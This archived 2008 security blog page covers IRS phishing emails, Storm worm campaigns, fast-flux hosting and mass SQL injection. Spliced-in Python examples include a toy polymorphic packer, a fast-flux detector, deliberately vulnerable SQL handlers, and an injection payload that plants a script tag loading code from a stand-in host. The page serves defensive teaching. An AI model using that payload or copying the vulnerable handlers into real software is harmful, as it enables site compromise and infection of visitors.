MSMVPS.COM

The Ultimate Destination for Blogs by Current and Former Microsoft Most Valuable Professionals.

Harry Waldron - Microsoft MVP Blog

Security News and Best Practices for corporate and home users

January 2008 - Posts

  • IRS Fake Refund Notices - Actual Example received in email

    As noted in this post, scammers try during tax season to trick individuals into revealing sensitive information that can then be used for identity theft or fraud. Never act on an email that claims to come from the IRS, a bank, or another agency; always verify with the source through a contact channel you already know to be genuine.

    The HTML and other aspects of this email look legitimate, but the message is a fake and should be deleted. Two tell-tale signs: the sender address is not on the irs.gov domain, and the "click here" link points at a bare numeric IP address rather than an IRS site.

    From: "Internal Revenue Service U.S.A" <refund@usa.gov>
    Subject: Important Message From IRS
    Date: Thu, 31 Jan 2008

     
     

    After the last annual calculations of your fiscal activity we have determined that you are eligible to receive a tax refund of $93.60. Please submit the tax refund request and allow us 6-9 days in order to process it.

    A refund can be delayed for a variety of reasons. For example submitting invalid records or applying after the deadline.

    To access your tax refund online, please click here (Malicious Numeric IP address in URL Removed)

    Regards,
    Internal Revenue Service

     
           
       

     

  • IRS and Tax based Scams - New Wave of Attacks

    As we enter a new tax reporting season, scammers are already trying to take advantage of individuals. Folks should be wary of all such email messages: they may appear authentic, but the IRS never initiates contact in that manner.
     
    Phone scammers are also asking for SSNs and other personal information that the IRS would already have on file anyway. If folks share sensitive information, identity thieves can use it to impersonate the victim and obtain money. Always check any request for information with the source when in doubt.
     
    Tis the Season for Tax Return Scams
    http://isc.sans.org/diary.html?storyid=3898
    http://www.timesheraldonline.com/ci_8108493

    QUOTE: A new wave of "phishing" e-mails making the rounds, claiming to be from the IRS, may be the work of scammers trying to capitalize on an economic stimulus package under consideration by Congress, an IRS spokesman said Monday.

    "The IRS never sends unsolicited initial e-mails," IRS spokesman Bill Steiner said. Nor does it ever ask for detailed personal and financial information, personal identification numbers, passwords or similar access information for credit cards, banks or other financial accounts, the men said.

    Phone scammers are also manipulating individuals
    http://www.kmbc.com/news/15152423/detail.html

    QUOTE: Scammers, pretending to be IRS agents, are calling unsuspecting people, asking for Social Security numbers and other personal information so a refund check can be sent.

    IRS Warning and Recommendations
    http://www.irs.gov/newsroom/article/0,,id=170894,00.html

    QUOTE: A new variation of the refund scheme may be directed toward organizations that distribute funds to other organizations or individuals. In an attempt to seem legitimate, the scam e-mail claims to be sent by, and contains the name and supposed signature of, the Director of the IRS Exempt Organizations area of the IRS. The e-mail asks recipients to click on a link to access a form for a tax refund. In reality, taxpayers claim their tax refunds through the filing of an annual tax return, not a separate application form.

    RECOMMENDATION: These e-mail messages can be forwarded to: phishing@irs.gov
     
    EXAMPLE OF TAX BASED PHISHING ATTACK :
     
    =========================================
    Tax Notification
    Internal Revenue Service (IRS)


    United States Department of the Treasury
    Date:  01/28/2008
     
    After the last annual calculations of your fiscal
    activity we have determined that you are eligible
    to receive a tax refund of $134.80.

     
    Please submit the tax refund request and allow us
    6-9 days in order to process it.

     
    A refund can be delayed for a variety of reasons.
    For example submitting invalid records or applying
    after the deadline.

     
    To access the form for your tax refund, click here
    (MALICIOUS WEBSITE LINK).


    Regards,

    Internal Revenue Service
    Document Reference: (92054568).

    =========================================

  • Firefox v2.0.12 to be released soon - Major Security Issue

    Firefox users should watch for an important update that addresses a serious security vulnerability. Mozilla has raised the severity rating of an unpatched flaw to high, and version 2.0.12 will be pushed out soon, according to the developers' blog. Most users will update automatically to the latest version when it becomes available.

    FF v2.0.12 release date currently targeted for 02/05/2008
    http://wiki.mozilla.org/Releases 

    Mozilla ups unpatched Firefox flaw to high severity
    http://blogs.zdnet.com/security/?p=841&tag=nl.e539

    * The chrome: protocol directory traversal issue is at proof-of-concept stage only so far (no in-the-wild attacks noted)

    * An attacker can use this vulnerability to collect session information, including session cookies and session history.

    * Firefox 2.0.12 is being prioritized and will be pushed out soon  

    http://blog.mozilla.com/security/2008/01/29/status-update-for-chrome-protocol-directory-traversal-issue/

    * A default Firefox installation is not vulnerable; the flaw is exposed only when certain add-ons are installed (long list in the link below), and many users have one of them

    Firefox Vulnerable Add-ins
    https://bugzilla.mozilla.org/attachment.cgi?id=300181

    * The most current version and release information can be obtained at:

    Mozilla Firefox Home Page
    http://www.mozilla.com/en-US/firefox/

  • Over Five Million unique malware types were created in 2007

    During the past two years, we have gradually moved from classic computer virus attacks to uniquely packaged trojan horse attacks that are massively spammed. For example, the Storm worm is highly polymorphic and can change its signature (as measured by the MD5 hash of the file) on an hourly basis. AV vendors are struggling to keep up, since a unique binary can be generated for each spam run, and a hash-based signature for one copy does not match the next.
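    The effect described above can be reproduced with a toy packer. The following is an added example, not code from the original post or from AV-Test: it repacks one constant payload fifty times with a fresh XOR key and random padding (the payload bytes, packer format and run size are constructed for the demo), then shows that every copy has a different MD5, that a blocklist holding the first copy's hash catches exactly one of them, and that hashing the unpacked payload instead catches all fifty.

```python
"""Added example, not from the original post or from AV-Test: a toy
polymorphic packer shows why one spam run yields thousands of "unique"
samples and why an MD5 blocklist cannot keep up, while hashing the unpacked
payload still catches every copy. The payload, the packer format and the
counts are constructed for the demo."""
import hashlib
import random

# Constructed stand-in for the malicious payload; identical in every copy.
PAYLOAD = b"toy payload: join p2p overlay, fetch spam template, send spam"


def pack(payload: bytes, key: int, pad_len: int, rng: random.Random) -> bytes:
    """Toy packer: XOR the payload with a one-byte key and append random junk.
    Header = key byte + 2-byte big-endian payload length so unpack() can undo it."""
    body = bytes(b ^ key for b in payload)
    junk = bytes(rng.getrandbits(8) for _ in range(pad_len))
    return bytes([key]) + len(payload).to_bytes(2, "big") + body + junk


def unpack(sample: bytes) -> bytes:
    """Inverse of pack(): recover the original payload and drop the junk."""
    key = sample[0]
    length = int.from_bytes(sample[1:3], "big")
    return bytes(b ^ key for b in sample[3:3 + length])


def md5hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def make_spam_run(n: int, seed: int = 2008) -> list:
    """One spam run: n copies of the same payload, each repacked with a fresh
    key and padding length, as a polymorphic loader would emit them."""
    rng = random.Random(seed)
    return [pack(PAYLOAD, rng.randrange(1, 256), rng.randrange(16, 64), rng)
            for _ in range(n)]


def count_unique_md5(samples) -> int:
    """What per-hash sample counting sees: one 'unique sample' per MD5."""
    return len({md5hex(s) for s in samples})


def file_hash_hits(samples, blocklist) -> int:
    """Hash-based detection: copies whose file MD5 is on the blocklist."""
    return sum(md5hex(s) in blocklist for s in samples)


def unpacked_hash_hits(samples, blocklist) -> int:
    """Same idea after emulating the unpacker: hash what actually runs."""
    return sum(md5hex(unpack(s)) in blocklist for s in samples)


def demo(n: int = 50) -> dict:
    samples = make_spam_run(n)
    seen_file = {md5hex(samples[0])}    # the one copy a vendor captured
    seen_payload = {md5hex(PAYLOAD)}    # signature on the unpacked code
    return {
        "unique_md5": count_unique_md5(samples),
        "file_hash_hits": file_hash_hits(samples, seen_file),
        "unpacked_hash_hits": unpacked_hash_hits(samples, seen_payload),
    }


if __name__ == "__main__":
    print(demo())   # {'unique_md5': 50, 'file_hash_hits': 1, 'unpacked_hash_hits': 50}
```

    Real packers are far more elaborate than a one-byte XOR, but the lesson is the same: counting or blocking by file hash measures the packer's output, not the malware family, which is why the AV-Test totals below climb so steeply and why vendors moved towards unpacking, emulation and behaviour-based detection.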

    Over Five Million unique malware types were created in 2007
    http://sunbeltblog.blogspot.com/2008/01/growth-of-malware.html
    http://www.darkreading.com/document.asp?doc_id=143424

    QUOTE: Experts at AV-Test, an independent testing organization, also reported skyrocketing incidence of malware yesterday. After a detailed count, the organization said it identified nearly 5.5 million different malware files in 2007 -- more than five times as many as in 2006.

    Year    Unique samples (MD5)    (per-year counts, not cumulative)
    ====    ====================
    1985             564
    1986             910
    1987             389
    1988           1,738
    1989           2,604
    1990           9,044
    1991          18,384
    1992          36,822
    1993          12,287
    1994          28,613
    1995          15,988
    1996          36,816
    1997         137,716
    1998         177,615
    1999          98,428
    2000         176,329
    2001         155,528
    2002         199,049
    2003         178,825
    2004         142,321
    2005         333,425
    2006         972,606
    2007       5,490,960

    What is an MD5 hash?
    http://en.wikipedia.org/wiki/Md5

  • Storm Worm - Launched one year ago

    During January 2007, one of Europe's worst winter storms was used as the lure to get folks to view a "news release" circulated in email. While the headlines were real, many individuals who followed the link were infected and joined a new P2P-based botnet that used fast-flux hosting (the DNS records for the malicious domain are rotated every few minutes across many infected hosts, which proxy traffic to the real back-end servers, so the true master servers are hard to find and take down).

    While most malware attacks recirculate older techniques or ideas, the Nuwar malware authors have been innovative in some of the technical aspects of the design (e.g., fast-flux hosting, rootkit infections, P2P-based botnet, etc). Each Storm worm attack should be carefully watched, including e-card attacks that may surface around Valentine's Day or other holidays later this year.

    Thanks to Microsoft's MSRT tool that's part of the Patch Tuesday updates, the size of the botnet has been reduced as thousands of PCs have been cleaned.  Still, it's envisioned that Storm worm will continue to be active for the foreseeable future. 

    Storm Worm - Launched one year ago
    http://www.f-secure.com/weblog/archives/00001367.html
    http://www.theregister.co.uk/2008/01/18/storm_worm_botnet/
    http://blog.washingtonpost.com/securityfix/2008/01/unhappy_birthday_to_the_storm.html

    Storm Worm overview
    http://en.wikipedia.org/wiki/Storm_Worm

    QUOTE: The Storm Worm malware (more properly known as a Trojan) strain first surfaced on 17 January 2007, in emails attempting to trick users into visiting maliciously-constructed websites under the guise of messages offering information about the storms ravaging Europe at the time.

    Compromised machines, however they are infected, become zombie clients under the control of hackers. The Storm Worm was the first botnet client to be based on a peer-to-peer (P2P) command and control protocol, an approach that makes networks of compromised PCs far more difficult to shut down. Over the last year, the Storm Worm has infected millions of Windows machines around the world.

  • Internet Domain Names - Five day grace period abused by malware developers

    The Storm worm, with its fast-flux hosting, and other malware are abusing the five-day grace period that follows registration of a new domain name. Based on recent trends, millions of domain names are registered and then deleted each month without ever being paid for, which gives attackers a free supply of throwaway domains. This is why folks need to be careful about visiting questionable sites reached through numeric IP addresses or unusually named domains.

    http://www.avertlabs.com/research/blog/index.php/2008/01/24/is-it-domain-tasting-or-domain-misusing/

    QUOTE: When a registrar registers a domain name, there is a five-day Add Grace Period (AGP) where he may cancel his request and receive a full credit for the registration fee from the registry. This trend has been gaining popularity since mid 2005, and although it was originally set up for avoiding mistakes, the practice now is frequently abused.

    Beside the fact that some domainers use it to track names with a high potential to generate traffic and thus pay-per-click revenues, people who use the fast-flux and rockphish techniques, which we have already discussed here in detail, now use it in proportions that would be interesting to measure. Domain Tasting involves registering names only to release them very quickly and without paying for them. This practice exploded in 2007, and an incredible number of temporary domain names, having definitely been used to carry out malicious activities, were deleted at the end of this add-grace period.

    MORE INFORMATION
    http://www.avertlabs.com/research/blog/index.php/2007/12/03/from-fast-flux-to-rockphish-part-1/
    http://www.avertlabs.com/research/blog/index.php/2007/12/03/from-fast-flux-to-rockphish-part-2/

  • French Bank SocGen suffers $7.1 Billion loss from inside fraud


     If confirmed, this represents the greatest fraud by a single individual of all time. The key issues were too much trust placed in one person and a lack of checks and balances. While most folks are ethical and trustworthy, companies always need compensating controls that "trust but verify" that all is going well.
     
     Most likely, large financial institutions will look at their controls even more closely after this scandal. This includes improving classical audit controls such as separation of duties, checks and balances, and limits on individual authority. These controls also help detect and prevent accidental errors.
     
     French bank blames trader for $7 billion fraud
     Societe Generale to seek new capital; swindle is one of history’s biggest
     http://www.msnbc.msn.com/id/22818054/
     
     
     QUOTE: PARIS - French bank Societe Generale said Thursday it has uncovered a $7.14 billion fraud — one of history’s biggest — by a single futures trader who orchestrated a series of bogus transactions. The fraud destabilized a major bank already exposed to the subprime crisis. France’s second largest bank by market value said it must seek 5.5 billion euros ($8.02 billion) in new capital, and the chief executive offered to resign.
     
     The trader at SocGen was responsible for basic futures hedging on European equity market indices, the company said, making bets on how the markets would perform at a future date. Futures trading began with selling commodities like sugar or oil to be delivered at a specified date. The practice has expanded enormously in recent years to include extremely complex financial instruments, but the company statement said the trader was involved in the more basic forms of hedging.
     
     If confirmed, the fraud would far outstrip the Nick Leeson trading scandal in 1995 that bankrupted British bank Barings. Barings collapsed after Leeson, the bank’s Singapore general manager of futures trading, lost 860 million pounds — then worth $1.38 billion — on Asian futures markets, wiping out the bank’s cash reserves. The company had been in business for more than 230 years.

  • Storm Worm - Valentine's Theme and Examples to avoid

    As previously noted, a new Valentine's theme emerged from the Storm worm botnet last week, and copies were received as shown below. This may have been a "test run" for a larger wave closer to Valentine's Day, when e-cards are more prevalent. Further samples haven't been encountered since last week. Users should avoid unexpected email attachments and links wherever possible. The Storm worm serves up advanced malware from fast-flux servers (meaning the hosting IP addresses constantly change), which is difficult to detect and clean.

    EXAMPLES OF STORM WORM VALENTINES DAY E-CARD ATTACKS
     
     Date: Thu, 17 Jan 2008 13:12:04 +0400
     From: [Sender Removed]
     To: Harry
     Subject: Words in my Heart
     
     You're In My Thoughts
     [Malicious URL using numeric IP address removed]
     
     - - - - - - - - - - - - - - - -
     
     Date: Thu, 17 Jan 2008 19:11:17 +0200
     From: [Sender Removed]
     To: Harry
     Subject: Eternity of Your Love
     
     A Dream is a Wish
     [Malicious URL using numeric IP address removed]

  • Mozilla - Celebrates 10th Anniversary

    I started using Mozilla and Opera browsers around 2001, when I started experimenting with Linux as a secondary workstation at work, to learn more about this environment.  I started with the full Mozilla suite, which included email client capabilities.  Later in 2002, I discovered the Windows beta versions of Mozilla, including Phoenix 0.3 browser (which was installable only in a zip build configuration). Later Firefox, Thunderbird, Seamonkey, and other products emerged from developers. 

    The competition between Firefox and Internet Explorer has led to improvements in functionality and security for both browsers.  Below are links related to Netscape's creation of the Mozilla initiative, which later led to Mozilla becoming the leading open-source technology for web browsers. Personally, I like IE 7, Firefox 3, and Opera 9.  Hopefully, innovation and protection will continue for all these products in the future. 

    Happy Birthday Mozilla!
    http://isc.sans.org/diary.html?storyid=3875

    QUOTE: Let's just all thank Mozilla for the wonderful browser and market they have created.  I've always said diversity is key.  It's great that I have been to hundreds of organizations and I can honestly say that each one has had Firefox installed.  Maybe not the default browser, but at least had it installed.


    January 22, 1998 -- the Beginning of Mozilla
    http://weblogs.mozillazine.org/mitchell/archives/2008/01/january_22_1998_the_beginning.html

    NETSCAPE ANNOUNCES PLANS TO MAKE NEXT-GENERATION COMMUNICATOR SOURCE CODE AVAILABLE FREE ON THE NET

    QUOTE:  MOUNTAIN VIEW, Calif. (January 22, 1998) -- Netscape Communications Corporation (NASDAQ: NSCP) today announced bold plans to make the source code for the next generation of its highly popular Netscape Communicator client software available for free licensing on the Internet. The company plans to post the source code beginning with the first Netscape Communicator 5.0 developer release, expected by the end of the first quarter of 1998. This aggressive move will enable Netscape to harness the creative power of thousands of programmers on the Internet by incorporating their best enhancements into future versions of Netscape's software. This strategy is designed to accelerate development and free distribution by Netscape of future high-quality versions of Netscape Communicator to business customers and individuals, further seeding the market for Netscape's enterprise solutions and Netcenter business.

  • Two-thirds of Oracle DBAs don't apply security patches

    The alarming statistics in this article may unfortunately be true. Some system administrators and DBAs favor application stability over fixing security risks, and the fixes may seem remote because a firewall or other controls keep many external threats out. Still, what if a database attack were triggered from the inside, by a malicious agent delivered in an email message or picked up from a malicious website? Perimeter controls do nothing against that. This was highlighted in today's SSWUG newsletter, and the good advice offered by the editor is also included below.

    Two-thirds of Oracle DBAs don't apply security patches
    http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9057226

    QUOTE: Complexity of task makes admins not want to bother -- Oracle Corp. issues dozens of security patches every quarter, but that doesn't mean database administrators are necessarily implementing them. In fact, a good two-thirds of all Oracle DBAs appear not to be installing Oracle's security patches at all, no matter how critical the vulnerabilities may be, according to survey results from Sentrigo Inc., a Woburn, Mass.-based vendor of database security products.


    SSWUG Newsletter - Two-Thirds Do Not Apply Service Packs... WHAT?!

    QUOTE: I don't know if you saw it, but there is a study out in Computer World that says that 66% of Oracle DBAs don't apply service packs to their systems. I'm not about to suggest that the percentage is different for SQL Server DBAs, but if it is, or isn't - what's up with that?!

    If it's true, it means that DBAs have a short attention span when it comes to remembering slammer and other issues with SQL Server that should never really have happened - things prevented by service packs, but that flourished because service packs weren't installed.

    At the time, the issues revolved around the fact that testing and making sure service packs were ready for installation took a long time to deploy. Now, though, things are much better - perhaps not completely a non-issue, but better. Are we still faced with not installing service packs and updates until a system breaks? I hope this isn't the case, but I have a feeling it probably is. I think once systems go behind firewalls, get stable and function that many avoid touching them. It's the old "if it ain't broke, don't fix it."

    But... it's not "right." If this is you - perhaps set up a schedule to review and deploy updates - just pick a period of time, like every 6 months, that you can use. Then, you know when that reminder comes up that you need to review the updates, get them tested and applied. Don't just ignore until it breaks, I think we're just collectively asking for trouble if we take that approach.

  • Storm Worm - Gearing up for Valentines Day

    Users should beware of email or e-card messages with Valentine's Day themes, as these are already circulating.

    Avoid these emails and stay up-to-date on AV protection.

    Storm Worm - Gearing up for Valentines Day
    http://isc.sans.org/diary.html?storyid=3855
    http://www.avertlabs.com/research/blog/index.php/2008/01/15/from-nuwar-with-love/
    http://sunbeltblog.blogspot.com/2008/01/new-storm-variant-in-time-for-valentine.html
    http://blog.trendmicro.com/storms-spamming-out-some-love/
    http://blog.trendmicro.com/chasing-storm-into-2008/
    http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_NUWAR.BK

    QUOTE:  With Christmas and New Year behind us, it’s not only shops getting ready for Valentine’s Day but Nuwar (a.k.a. Storm) as well. You may receive a Valentine-themed E-mail with subject like “I Dream of you”, “For You….My Love”, “Sending You My Love”, etc. etc. and the body text prompting you to click on a typical Nuwar-style numeric IP address link.

  • Microsoft IT Resources - Top 25 blog links on TechNet and MSDN

  • Microsoft Windows Home Server - How to get started

    Microsoft Windows Home Server was announced during CES 2007, just over one year ago. Windows Home Server is a home server operating system supporting file sharing, backup automation and remote access. It is derived from Windows Server 2003 SP2 and requires a dedicated server PC. It offers good security and functionality for advanced home network users.

    This six page article, along with the links below offer good advice on how to get started:


    Microsoft Windows Home Server - How to get started
    http://www.informationweek.com/news/showArticle.jhtml?articleID=204805989

    QUOTE: The question for you is, do you have a home network that connects several PCs, but no backups of all the important data on those PCs? The odds are you do. If so, Windows Home Server may be just the solution you need. This extremely smart server application will back up all those PCs as safely as you want, provide easy access to the files you want to share on your network (like music and media files), and even give you remote access to your files and computers across the Internet.

    That may all sound too good to be true, but believe it. Windows Home Server is a great application. It does have what you might consider a downside: you have to dedicate a PC to running it. But while you might think of laying out for another computer as a problem, to Microsoft that's an opportunity. In fact, Microsoft thinks there are perhaps as many as 40 million people just like you out there, which is its estimate of the market for its Window Home Server product.


    MINIMUM HARDWARE REQUIREMENTS
    (it's always good to try to double these if possible)

    The following minimum specs are needed:

    -- 1.0 GHz Intel Pentium 3 (or equivalent) processor
    -- 512 MB RAM
    -- 80 GB internal hard drive as primary drive
    -- 100 Mbit/s wired Ethernet
    -- Bootable DVD drive
    -- Display
    -- Keyboard and mouse



    SOME KEY DESIGN AND USAGE POINTS FROM THE ARTICLE

    1. Determine your needs in home networking multiple PCs together and devote a PC for the Windows Home Server environment

    2. Determine backup and access usages for all computers and devices (e.g., printers) accessing this environment

    3. Because Home Server has to make a wired connection to your router, the physical installation must be nearby and may be an issue if there is limited space.

    4. Home Server works automatically only with Windows PCs that you can install the client software on. Linux boxes and Macs can access and save files to the server's shared folders, but Home Server won't automatically back them up.

    5. The more intensively you use Home Server, the more you'll find that your network's speed can be a bottleneck. Basic 802.11b/g wireless is OK for doing backups of a couple of PCs, but if you get into using Home Server as a media server, or even backing up significant volumes of frequently changing data

    6. Home Server by itself isn't a complete backup strategy. Getting your data backed up to a different computer onsite is good. Better would be to back it up offsite.

    Additional resources can be found here:

    Microsoft's Windows Home Server - Home Page
    http://www.microsoft.com/windows/products/winfamily/windowshomeserver/default.mspx

    Microsoft's Windows Home Server - Key Features
    http://www.microsoft.com/windows/products/winfamily/windowshomeserver/features.mspx

    Windows Home Server - Technet Blog Home Page
    http://blogs.technet.com/homeserver/

    What's Hot from WinHEC - Windows Home Server
    http://www.informationweek.com/blog/main/archives/2007/05/whats_hot_from.html

    Microsoft Windows Home Server - Wikipedia information and links
    http://en.wikipedia.org/wiki/Windows_Home_Server

  • Storm Worm - Phishing attacks from the Botnet

    F-Secure shares an analysis of how the Storm Worm botnet might be used in hosting a phishing attack to gain sensitive privacy or bank account information.

    Storm Worm - Phishing attacks from the Botnet
    http://www.f-secure.com/weblog/archives/00001359.html

    QUOTE: Last night there was a phishing run. The IP address of the site was changing every second or so. The server was an active fast flux site and was hosted within a botnet.  Interestingly, when we picked out a random IP address from the list and resolved that address to other sites hosted in the past, we found something familiar (e.g., hellosanta2008 and postcards-2008). 

    This sounds like Storm. So somebody is now using machines infected with and controlled by Storm to run phishing scams. We haven't seen this before. October brought evidence of Storm variations using unique security keys. The unique keys will allow the botnet to be segmented allowing "space for rent". It looks as if the Storm gang is preparing to sell access to their botnet.
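    The Storm anniversary post above describes fast-flux hosting, and the F-Secure quote here shows it in action (the phishing site's IP address changing every second). The following is an added example, not code from F-Secure or from the original post: a small detector of the kind a resolver log could feed, which scores a domain by how many distinct IPs and distinct networks its A records cycle through and how short their TTL is. The DNS observations are constructed, the /16 network key stands in for an AS lookup, and the thresholds and weights are assumptions chosen for the demo.

```python
"""Added example, not from the original post, F-Secure or Avert Labs: a
small fast-flux detector fed from resolver observations. The lookups,
the /16-as-network simplification and the thresholds are constructed or
assumed for the demo."""
from collections import defaultdict

# Constructed resolver observations: (seconds since start, domain, TTL, A records).
# The first domain rotates its answers every lookup across three networks;
# the second is a normal static host.
SAMPLE_LOOKUPS = [
    (0,   "ecard-2008.test", 120,   ["203.0.113.10", "198.51.100.20", "192.0.2.30"]),
    (120, "ecard-2008.test", 120,   ["203.0.113.77", "198.51.100.5", "192.0.2.91"]),
    (240, "ecard-2008.test", 120,   ["203.0.113.40", "198.51.100.66", "192.0.2.8"]),
    (0,   "static.example.test", 86400, ["192.0.2.100"]),
    (240, "static.example.test", 86400, ["192.0.2.100"]),
]


def network_key(ip: str) -> str:
    """Crude network identity: the /16 of an IPv4 address. A real deployment
    would map the IP to its AS number instead (assumption: no whois here)."""
    return ".".join(ip.split(".")[:2])


def summarize(lookups):
    """Per-domain stats: distinct IPs, distinct networks, shortest TTL, and how
    many answers introduced IPs not seen in any earlier answer (churn)."""
    stats = defaultdict(lambda: {"ips": set(), "nets": set(), "min_ttl": None,
                                 "answers": 0, "churn": 0})
    for _, domain, ttl, rrs in sorted(lookups, key=lambda r: r[0]):
        s = stats[domain]
        s["answers"] += 1
        if s["answers"] > 1 and any(ip not in s["ips"] for ip in rrs):
            s["churn"] += 1
        s["ips"].update(rrs)
        s["nets"].update(network_key(ip) for ip in rrs)
        s["min_ttl"] = ttl if s["min_ttl"] is None else min(s["min_ttl"], ttl)
    return stats


def flux_score(s) -> int:
    """Simplified fluxiness: distinct IPs count once, distinct networks count
    three times (weights are an assumption for the demo). A CDN also has many
    IPs and short TTLs, but they tend to sit in a few networks, so the network
    term is what separates flux from legitimate load balancing."""
    return len(s["ips"]) + 3 * len(s["nets"])


def classify(lookups, ttl_limit=300, score_limit=12):
    """Return {domain: True if it looks like a fast-flux domain}."""
    return {
        domain: s["min_ttl"] <= ttl_limit and flux_score(s) >= score_limit
        for domain, s in summarize(lookups).items()
    }


if __name__ == "__main__":
    for domain, flagged in classify(SAMPLE_LOOKUPS).items():
        print(domain, "FAST-FLUX" if flagged else "ok")
```

    Three lookups are enough to separate the two constructed domains; in practice you would collect answers over an hour or more before scoring, and add the churn counter to the score if you find CDNs still tripping the network term.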

  • Massive SQL-Server Web based Injection Attacks

    I've been using SQL Server since it came out in 1994, and the SSWUG community is an excellent resource that I've been a member of for years.  In today's newsletter they highlight a major new attack that may have affected up to 70,000 servers and 94,000 unique web addresses.  It is vital to stay up-to-date on patches and AV protection.  More importantly, firewalls, secure coding of web applications (parameterized queries and input validation rather than SQL built by string concatenation), and security testing are all important in ensuring these malicious injection attacks are properly blocked.
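    To make the attack concrete, here is an added example (not code from the original post, SSWUG or the linked articles): a login handler and a registration handler that build their SQL by string concatenation, the parameterized versions beside them, a constructed payload that appends a script tag to every page in the style of the mass injection described here, and a check that scans web-server log lines for the kind of probes an automated injection bot sends. The schema, accounts, pages, payload, IP address, script name and log lines are all constructed for the demo.

```python
"""Added example, not from the original post, SSWUG or the linked articles:
a login handler and a registration handler that build SQL by string
concatenation (the kind of code an automated injection bot hunts for), the
parameterized versions beside them, and a check that scans web-server log
lines for injection probes. The schema, accounts, pages, payload and log
lines are all constructed for the demo; the IP and script name are made up."""
import re
import sqlite3
from urllib.parse import unquote_plus


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users (name TEXT, pw TEXT);
        INSERT INTO users VALUES ('alice', 's3cret');
        CREATE TABLE pages (title TEXT, body TEXT);
        INSERT INTO pages VALUES ('home', '<p>Welcome</p>');
        INSERT INTO pages VALUES ('news', '<p>Headlines</p>');
    """)
    return con


def login_vulnerable(con, name: str, pw: str) -> bool:
    # BAD: user input is spliced into the statement text, so a quote in the
    # input changes the query's logic.
    sql = f"SELECT name FROM users WHERE name = '{name}' AND pw = '{pw}'"
    return con.execute(sql).fetchone() is not None


def login_safe(con, name: str, pw: str) -> bool:
    # GOOD: placeholders keep the input as data; the statement shape is fixed.
    sql = "SELECT name FROM users WHERE name = ? AND pw = ?"
    return con.execute(sql, (name, pw)).fetchone() is not None


def register_vulnerable(con, name: str, pw: str) -> None:
    # BAD: same concatenation, and the driver runs a whole batch of statements.
    # SQL Server batches behave that way by default; sqlite3 only does it via
    # executescript(), which is used here to reproduce the effect.
    con.executescript(f"INSERT INTO users VALUES ('{name}', '{pw}');")


def register_safe(con, name: str, pw: str) -> None:
    con.execute("INSERT INTO users VALUES (?, ?)", (name, pw))


# Constructed payload in the style of the mass attack described above: close
# the string and statement, then append a script tag to every page body.
DEFACE_PAYLOAD = ("bob', 'x'); UPDATE pages SET body = body || "
                  "'<script src=\"http://203.0.113.1/x.js\"></script>'; --")


def defaced_page_count(con) -> int:
    """How many pages now carry an injected <script> tag."""
    return con.execute(
        "SELECT count(*) FROM pages WHERE body LIKE '%<script%'").fetchone()[0]


# Detection side: decoded request paths containing the usual injection idioms.
# Expect some false positives on '--' and '/*'; tune the list for your own site.
PROBE = re.compile(
    r"(union\s+select|declare\s+@|cast\s*\(|exec\s*\(|;\s*(update|insert|drop)\s|--|/\*)",
    re.IGNORECASE)

# Constructed web-server log lines (common log format); the second and third
# are what an automated injection bot's probes look like.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Jan/2008:09:12:01 +0000] "GET /login.asp?user=alice&pw=x HTTP/1.1" 200 512',
    '198.51.100.7 - - [10/Jan/2008:09:12:03 +0000] "GET /login.asp?user=a%27%3BDECLARE+%40s+varchar(4000)%3B-- HTTP/1.1" 200 512',
    '198.51.100.7 - - [10/Jan/2008:09:12:04 +0000] "GET /news.asp?id=1%27+UNION+SELECT+name+FROM+sysobjects-- HTTP/1.1" 500 88',
]


def flag_injection_probes(log_lines) -> list:
    """Return the decoded request paths that look like SQL injection probes."""
    hits = []
    for line in log_lines:
        m = re.search(r'"(?:GET|POST) (\S+)', line)
        if m:
            path = unquote_plus(m.group(1))
            if PROBE.search(path):
                hits.append(path)
    return hits
```

    The point of the pair of handlers is that the fix is not filtering quotes but never letting input become part of the statement text; the log check is a cheap way to see whether the bot the newsletter describes has already been knocking on your registration and login pages.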

    SSWUG.ORG Newsletter - (SQL-Server Users Group)
    http://www.sswug.org/nlarchive.asp?odate=1/10/2008

    QUOTE: Injection again ... I don't know if you've seen the reports, but there is a "mass attack" (my term) that has been going on with an automated SQL Injection engine of sorts that's out looking to find login and registration systems, then attempt SQL injection against the site. 

    What's unique about this is that it's a very broad attack, not a hacker trying to breach a system on a system-by-system basis as has traditionally been the case.  This means that to turn this thing loose on all types of sites is "just" a matter of replicating the engine and letting it run amuck.  You can see that this could be a (rather successful) test brute-force approach to trying out just about every other attack that has, to-date at least, been based on a person doing the work.  Traditional injection is about interpreting results, seeing what's returned by the site or application and tweaking your approach.  With this approach - a forced and automated one - the possibility for coming in on multiple attack vectors simultaneously is very possible.

    If you're not testing your systems, I highly recommend you consider it.  There are some solid tools and services out there that can help you learn a lot about what vulnerabilities you may have, and they generally help you understand both how they work and how to prevent them.  With this go-round on the hacker attacks on injection, I've seen reports of as many as 70,000 servers infected.  That's a big number and the infections are not passive - they're malicious injection of javascript code.  Take the steps now to learn what can be done to and for your systems.


    Additional links are noted below:

    Mass exploits with SQL Injection
    http://isc.sans.org/diary.html?storyid=3823
    http://isc.sans.org/diary.html?storyid=3810

    QUOTE: It turned out that there is an automated script or a bot exploiting SQL injection attacks in vulnerable web applications. I remembered that I saw the very same attack appearing back in November last year but it was not this wide spread – it appears that the attacker improved the crawling/attacking function of his bot so he managed to compromise more web sites.

    Mass hack infects tens of thousands of sites
    http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9055858

    QUOTE: On Saturday, said Thompson, the number of sites that had fallen victim to the attack numbered more than 70,000. "This was a pretty good mass hack," said Thompson, in a post to his blog. "It wasn't just that they got into a server farm, as the victims were quite diverse, with presumably the only common point being whatever vulnerability they all shared." ... However, many of those sites -- which as of this morning numbered more than 93,000, according to a quick Google search -- had not been cleaned.

    Register Article
    http://www.theregister.co.uk/2008/01/08/malicious_website_redirectors/

    QUOTE: At time of writing, more than 94,000 URLs had been infected by the fast-moving exploit, which redirects users to the malicious domain

    Additional References
    http://www2.csoonline.com/blog_view.html?CID=33430
    http://www.modsecurity.org/blog/archives/2008/01/index.html
    http://explabs.blogspot.com/2008/01/so-this-is-kind-of-interesting.html

  • Windows Vista - 12 Tips To Boost Your PC's Performance

    The two articles below provide excellent advice on how to improve sluggish performance issues with Windows Vista, as it's a different environment than Windows XP

